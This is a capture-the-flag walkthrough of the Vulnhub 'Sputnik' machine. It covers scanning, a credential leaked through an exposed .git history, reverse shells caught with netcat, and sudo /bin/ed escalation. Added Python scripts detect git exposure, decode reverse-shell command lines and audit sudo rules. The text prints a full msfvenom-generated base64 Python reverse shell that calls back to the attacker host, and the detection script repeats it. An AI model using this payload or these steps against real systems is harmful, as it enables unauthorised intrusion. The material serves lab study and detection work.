Sputnik
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.90.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:d0:94:27 1 60 PCS Systemtechnik GmbH
192.168.56.135 08:00:27:d8:0b:51 1 60 PCS Systemtechnik GmbH
netdiscover identifies the target host's IP address as 192.168.56.135.
Nmap scan
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.135 -oN nmap_full_scan
sudo: unable to resolve host kali: Temporary failure in name resolution
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-27 02:32 EDT
Nmap scan report for bogon (192.168.56.135)
Host is up (0.000069s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
8089/tcp open ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-03-29T11:03:21
|_Not valid after: 2022-03-28T11:03:21
|_http-server-header: Splunkd
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry
|_/
55555/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Flappy Bird Game
| http-git:
| 192.168.56.135:55555/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
61337/tcp open http Splunkd httpd
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://bogon:61337/en-US/account/login?return_to=%2Fen-US%2F
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.68 seconds
The Nmap results show that the services on the target host are related to Splunk, a log analysis and data analytics platform.
Information gathering
Examine the discovered ports in turn, starting with port 8089. The Nmap scan already showed that this port is wrapped in SSL/TLS, so first check which curl option skips certificate verification:
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl --help all | grep secure
--doh-insecure Allow insecure DoH server connections
-k, --insecure Allow insecure server connections
--proxy-insecure Do HTTPS proxy connections without verifying the proxy
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/ -k
<?xml version="1.0" encoding="UTF-8"?>
<!--This is to override browser formatting; see server.conf[httpServer] to disable. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-->
<?xml-stylesheet type="text/xml" href="/static/atom.xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:s="http://dev.splunk.com/ns/rest">
<title>splunkd</title>
<id>https://192.168.56.135:8089/</id>
<updated>2022-10-27T15:16:51+00:00</updated>
<generator build="962d9a8e1586" version="7.2.5.1"/>
<author>
<name>Splunk</name>
</author>
<entry>
<title>rpc</title>
<id>https://192.168.56.135:8089/rpc</id>
<updated>1970-01-01T00:00:00+00:00</updated>
<link href="/rpc" rel="alternate"/>
</entry>
<entry>
<title>services</title>
<id>https://192.168.56.135:8089/services</id>
<updated>1970-01-01T00:00:00+00:00</updated>
<link href="/services" rel="alternate"/>
</entry>
<entry>
<title>servicesNS</title>
<id>https://192.168.56.135:8089/servicesNS</id>
<updated>1970-01-01T00:00:00+00:00</updated>
<link href="/servicesNS" rel="alternate"/>
</entry>
<entry>
<title>static</title>
<id>https://192.168.56.135:8089/static</id>
<updated>1970-01-01T00:00:00+00:00</updated>
<link href="/static" rel="alternate"/>
</entry>
</feed>
The response above lists 3 links; visit each of them in turn.
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/rpc -k
Invalid request
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/services -k
<?xml version="1.0" encoding="UTF-8"?>
<response>
<messages>
<msg type="ERROR">Unauthorized</msg>
</messages>
</response>
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/servicesNS -k
<?xml version="1.0" encoding="UTF-8"?>
<response>
<messages>
<msg type="ERROR">Unauthorized</msg>
</messages>
</response>
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/static -k
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Next, look at port 55555 on the target host.
According to the Nmap scan, port 55555 serves a /.git directory.
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ gobuster dir -u http://192.168.56.135:55555 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.135:55555
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/10/27 02:39:30 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 305]
===============================================================
2022/10/27 02:39:56 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ dirb http://192.168.56.135:55555
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Oct 27 02:40:27 2022
URL_BASE: http://192.168.56.135:55555/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.135:55555/ ----
+ http://192.168.56.135:55555/.git/HEAD (CODE:200|SIZE:23)
+ http://192.168.56.135:55555/index.html (CODE:200|SIZE:7834)
+ http://192.168.56.135:55555/server-status (CODE:403|SIZE:305)
-----------------
END_TIME: Thu Oct 27 02:40:29 2022
DOWNLOADED: 4612 - FOUND: 3
The directory brute-forcing tools also confirm the Nmap result.
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl http://192.168.56.135:55555/.git/HEAD
ref: refs/heads/master
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl http://192.168.56.135:55555/.git/logs/HEAD
0000000000000000000000000000000000000000 21b4eb398bdae0799afbbb528468b5c6f580b975 root <root@sputnik.(none)> 1553864873 +0000 clone: from https://github.com/ameerpornillos/flappy.git
This is a clone record: the repository was cloned from https://github.com/ameerpornillos/flappy.git. Cloning that repository locally and reviewing its history with git log -p:
┌──(kali㉿kali)-[~/Vulnhub/Sputnik/flappy]
└─$ git log -p
diff --git a/secret b/secret
new file mode 100644
index 0000000..f438519
--- /dev/null
+++ b/secret
@@ -0,0 +1 @@
+sputnik:ameer_says_thank_you_and_good_job
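Review bot: the added line `+sputnik:ameer_says_thank_you_and_good_job` in b/secret commits a plaintext credential to the repository history, where anyone who can clone or fetch the repository (including via the exposed /.git directory on port 55555) can read it. The file should be removed, the password rotated, and the secret supplied through an untracked configuration file or environment variable, with a .gitignore entry so it is not re-added.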
This reveals the password for the user sputnik.
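The exposed /.git directory and the credential committed in the repository history are two findings a defender can check for on their own hosts. The following Python script is an added example written for this page (it is not from the original post, the Sputnik VM, or the flappy repository): it validates that a fetched /.git/HEAD body really is a git HEAD file rather than a catch-all 200 page, parses the .git/logs/HEAD reflog line format seen above, and scans `git log -p` output for added lines that look like credentials. The sample inputs are the HEAD, reflog and diff lines from this page, embedded as constants; the function names and the credential regex are this example's own choices.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# --- sample inputs, copied from the session above (constructed constants) ---
SAMPLE_HEAD = "ref: refs/heads/master\n"
SAMPLE_REFLOG = (
    "0000000000000000000000000000000000000000 "
    "21b4eb398bdae0799afbbb528468b5c6f580b975 "
    "root <root@sputnik.(none)> 1553864873 +0000\t"
    "clone: from https://github.com/ameerpornillos/flappy.git"
)
SAMPLE_DIFF = """diff --git a/secret b/secret
new file mode 100644
index 0000000..f438519
--- /dev/null
+++ b/secret
@@ -0,0 +1 @@
+sputnik:ameer_says_thank_you_and_good_job
"""

# A real .git/HEAD is either a symbolic ref or a bare 40-hex object id.
HEAD_RE = re.compile(r"^(ref: refs/\S+|[0-9a-f]{40})$")

# Reflog line as git writes it into .git/logs/HEAD:
#   <old-sha> <new-sha> <name> <email> <unix-time> <tz>\t<message>
# The separator before the message is accepted as tab or space, because
# copied terminal output often loses the tab.
REFLOG_RE = re.compile(
    r"^(?P<old>[0-9a-f]{40}) (?P<new>[0-9a-f]{40}) "
    r"(?P<name>.*?) <(?P<email>[^>]*)> (?P<ts>\d+) (?P<tz>[+-]\d{4})[\t ](?P<msg>.*)$"
)

# Added lines shaped like "user:password" or "password=value" (assumed heuristic).
CRED_RE = re.compile(
    r"^(?:[A-Za-z0-9_.-]+:[^\s:]{8,}"
    r"|(?:pass(?:word|wd)?|secret|token|api[_-]?key)\s*[=:]\s*\S+)$",
    re.IGNORECASE,
)


@dataclass
class ReflogEntry:
    old_sha: str
    new_sha: str
    name: str
    email: str
    timestamp: int
    tz: str
    message: str

    @property
    def is_clone(self) -> bool:
        return self.message.startswith("clone:")


def is_git_head(body: str) -> bool:
    """True if an HTTP response body for /.git/HEAD is a genuine git HEAD file."""
    return HEAD_RE.match(body.strip()) is not None


def parse_reflog_line(line: str) -> ReflogEntry:
    """Split one .git/logs/HEAD line into its fields."""
    m = REFLOG_RE.match(line.rstrip("\n"))
    if not m:
        raise ValueError("not a reflog line: %r" % line)
    return ReflogEntry(m["old"], m["new"], m["name"], m["email"],
                       int(m["ts"]), m["tz"], m["msg"])


def find_committed_secrets(diff_text: str) -> List[Tuple[str, str]]:
    """Walk unified-diff output (e.g. from `git log -p`) and return (file, line)
    for every added line that looks like a credential. URLs are skipped so that
    'https://host/path' is not mistaken for 'user:password'."""
    hits = []
    current = None
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            current = raw[4:]
            current = current[2:] if current.startswith("b/") else current
            continue
        if raw.startswith("+") and not raw.startswith("+++"):
            added = raw[1:].strip()
            if "://" not in added and CRED_RE.match(added):
                hits.append((current, added))
    return hits


if __name__ == "__main__":
    print("HEAD body is a git HEAD file:", is_git_head(SAMPLE_HEAD))
    entry = parse_reflog_line(SAMPLE_REFLOG)
    print("reflog: %s <%s> clone=%s %s" % (entry.name, entry.email, entry.is_clone, entry.message))
    for path, line in find_committed_secrets(SAMPLE_DIFF):
        print("credential committed in %s: %s" % (path, line))
```

In practice `is_git_head` is applied to the body your own scanner fetched from each web root, and `find_committed_secrets` to `git log -p --all` of each repository you publish; a hit in either is a finding to remediate (block /.git at the web server, rotate and purge the credential), not something to leave for the next visitor to find.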
Log in with this username and password.
┌──(kali㉿kali)-[~/Vulnhub/Sputnik/flappy]
└─$ ls
index.html README.md sheet.png splunk_shells-1.2.tar.gz sprite.js
┌──(kali㉿kali)-[~/Vulnhub/Sputnik/flappy]
└─$ sudo nc -nlvp 5555
sudo: unable to resolve host kali: Temporary failure in name resolution
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.135] 47694
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
which python
/opt/splunk/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
After running the command above, the target hangs and never drops into an interactive shell.
Generate another shell payload with msfvenom:
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ msfvenom -p cmd/unix/reverse_python lhost=192.168.56.101 lport=6666 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 605 bytes
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('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')[0]))"
┌──(kali㉿kali)-[~/Vulnhub/Sputnik/flappy]
└─$ sudo nc -nlvp 5555
sudo: unable to resolve host kali: Temporary failure in name resolution
listening on [any] 5555 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.135] 48408
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
which python
/opt/splunk/bin/python
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICwgICAgICAgc3VicHJvY2VzcyAgICwgICAgICAgb3MgICAgOyAgICAgIGhvc3Q9IjE5Mi4xNjguNTYuMTAxIiAgICA7ICAgICAgcG9ydD02NjY2ICAgIDsgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAsICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgOyAgICAgIHMuY29ubmVjdCgoaG9zdCAgICwgICAgICAgcG9ydCkpICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDApICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDEpICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDIpICAgIDsgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=')[0]))"
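The encoded one-liner msfvenom produced above is exactly the kind of process command line an auditd or EDR execution log records, and it is what a detection engineer wants to catch. As an added example (not from the original post or from Metasploit), the Python script below extracts the base64 argument from such a `python -c "exec(__import__('base64').b64decode(...))"` command line, decodes it, and classifies the result by the behaviours a reverse shell needs: a socket, an outbound connect, stdio redirected with dup2, and a shell spawned. The first two sample command lines are constructed for this example; the third is the payload captured in the session above, verbatim. The function names and verdict labels are this example's own.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Constructed sample execution log: the command lines an exec-audit record would carry.
# Entries 1 and 2 are made up; entry 3 is the payload from the session above.
SAMPLE_CMDLINES = [
    "python -c 'import sys; print(sys.version)'",
    "python -c \"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('"
    + base64.b64encode(b'print("hello from a benign encoded script")').decode()
    + "')[0]))\"",
    "python -c \"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('"
    "aW1wb3J0IHNvY2tldCAgICwgICAgICAgc3VicHJvY2VzcyAgICwgICAgICAgb3MgICAgOyAgICAgIGhvc3Q9IjE5Mi4xNjguNTYuMTAxIiAgICA7ICAgICAgcG9ydD02NjY2ICAgIDsgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAsICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgOyAgICAgIHMuY29ubmVjdCgoaG9zdCAgICwgICAgICAgcG9ydCkpICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDApICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDEpICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDIpICAgIDsgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik="
    "')[0]))\"",
]

# A quoted run of base64 alphabet characters long enough to be a script, not a name.
B64_ARG_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")

# Behaviours that together mean "this process wires a socket to a shell".
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "socket-create": re.compile(r"socket\.socket\("),
    "outbound-connect": re.compile(r"\.connect\(\s*\("),
    "fd-redirect": re.compile(r"os\.dup2\("),
    "spawn-shell": re.compile(
        r"(?:subprocess\.(?:call|Popen)|pty\.spawn|os\.system)\(\s*['\"]/bin/(?:ba|da|z)?sh"
    ),
}
REVERSE_SHELL_CORE = {"outbound-connect", "fd-redirect", "spawn-shell"}


def extract_encoded_payload(cmdline: str) -> Optional[str]:
    """Return the decoded script carried by a b64decode() one-liner, or None."""
    if "b64decode" not in cmdline:
        return None
    blobs = B64_ARG_RE.findall(cmdline)
    if not blobs:
        return None
    blob = max(blobs, key=len)  # the script is the longest quoted blob
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def classify_payload(decoded: str) -> List[str]:
    """Names of the indicator patterns present in the decoded script."""
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def triage(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Decode and score each command line; verdict labels are this example's own."""
    results = []
    for cmd in cmdlines:
        decoded = extract_encoded_payload(cmd)
        if decoded is None:
            hits: List[str] = []
            verdict = "undecodable" if "b64decode" in cmd else "no-encoded-payload"
        else:
            hits = classify_payload(decoded)
            if REVERSE_SHELL_CORE <= set(hits):
                verdict = "reverse-shell"
            elif hits:
                verdict = "suspicious"
            else:
                verdict = "encoded-but-no-shell-indicators"
        results.append({"cmdline": cmd, "decoded": decoded,
                        "indicators": hits, "verdict": verdict})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_CMDLINES):
        print("%-32s %s" % (r["verdict"], ", ".join(r["indicators"]) or "-"))
```

Decoding before matching is the point: a rule that only looks for `socket`/`dup2` in the raw command line never fires on this payload, because msfvenom hides those tokens behind base64 and random whitespace. Alerting on `reverse-shell` and reviewing `suspicious` keeps the noise from legitimate encoded scripts (build tooling, installers) manageable.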
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ sudo nc -nlvp 6666
sudo: unable to resolve host kali: Temporary failure in name resolution
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.135] 53886
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
which python
/opt/splunk/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
splunk@sputnik:/$ sudo -l
sudo -l
[sudo] password for splunk: ameer_says_thank_you_and_good_job
Matching Defaults entries for splunk on sputnik:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User splunk may run the following commands on sputnik:
(root) /bin/ed
With this shell, Python can spawn an interactive shell.
Then check sudo -l.
It shows that /bin/ed can be run as root, which can be leveraged.
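The `sudo -l` result above is why the author marks /bin/ed as usable for escalation: an interactive editor run as root can launch other programs as root, so the entry is equivalent to granting a root shell. The Python script below is an added example (not from the original post) that parses `sudo -l` output into (run-as, tag, command) entries and flags commands that hand the caller an interactive session, together with the change a defender would make. The sample input is the sudo output from this page plus one constructed benign entry; the list of flagged binaries and the function names are this example's assumptions.

```python
import re
from typing import Dict, List

# Constructed sample: the `sudo -l` output captured on sputnik above, plus one
# made-up entry so the benign path is exercised too.
SAMPLE_SUDO_L = r"""Matching Defaults entries for splunk on sputnik:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User splunk may run the following commands on sputnik:
    (root) /bin/ed
    (root) NOPASSWD: /usr/local/bin/rotate-logs.sh
"""

# Programs that give the caller an interactive session from which further programs
# can be started. Assumed list: shells, editors and pagers named in sudo hardening
# guides (sudoedit exists precisely so editors need not run as root).
ESCAPE_CAPABLE = {
    "sh": "shell", "bash": "shell", "dash": "shell", "zsh": "shell",
    "ed": "editor", "vi": "editor", "vim": "editor", "nano": "editor", "emacs": "editor",
    "less": "pager", "more": "pager",
}

FIX_FOR = {
    "editor": "use sudoedit for root-owned files instead of running the editor as root",
    "pager": "have the specific command write to the user instead of granting the pager",
    "shell": "grant the specific non-interactive command the user needs",
    "unrestricted": "replace ALL with the specific commands the user needs",
}

# One command entry:  (runas[:group]) [TAG: ...] /path/to/command [args]
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$"
)


def parse_sudo_l(text: str) -> List[Dict[str, str]]:
    """Return the command entries that follow the 'may run the following commands' line."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if m:
            entries.append({
                "runas": m["runas"].strip(),
                "tags": m["tags"].replace(" ", "").rstrip(":"),
                "command": m["cmd"],
                "args": m["args"].strip(),
            })
    return entries


def audit_sudo_l(text: str) -> List[Dict[str, str]]:
    """Flag entries whose command is an interactive program (or ALL); each finding
    carries the reason and the recommended change."""
    findings = []
    for e in parse_sudo_l(text):
        name = e["command"].rsplit("/", 1)[-1]
        if e["command"] == "ALL":
            kind, reason = "unrestricted", "ALL permits every command as %s" % e["runas"]
        elif name in ESCAPE_CAPABLE:
            kind = ESCAPE_CAPABLE[name]
            reason = "%s is an interactive %s that can launch other programs as %s" % (
                name, kind, e["runas"])
        else:
            continue  # a specific non-interactive command: review its contents separately
        findings.append({"runas": e["runas"], "tags": e["tags"], "command": e["command"],
                         "reason": reason, "fix": FIX_FOR[kind]})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print("(%s) %s %s\n  why: %s\n  fix: %s" % (
            f["runas"], f["tags"], f["command"], f["reason"], f["fix"]))
```

The script is a review aid for `sudo -l` output gathered from your own hosts (or for sudoers lines fed in the same shape); an entry that is not flagged is not automatically safe, since a script like the constructed rotate-logs.sh is only as safe as its contents and its file permissions.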
From: https://www.cnblogs.com/jason-huawen/p/16832485.html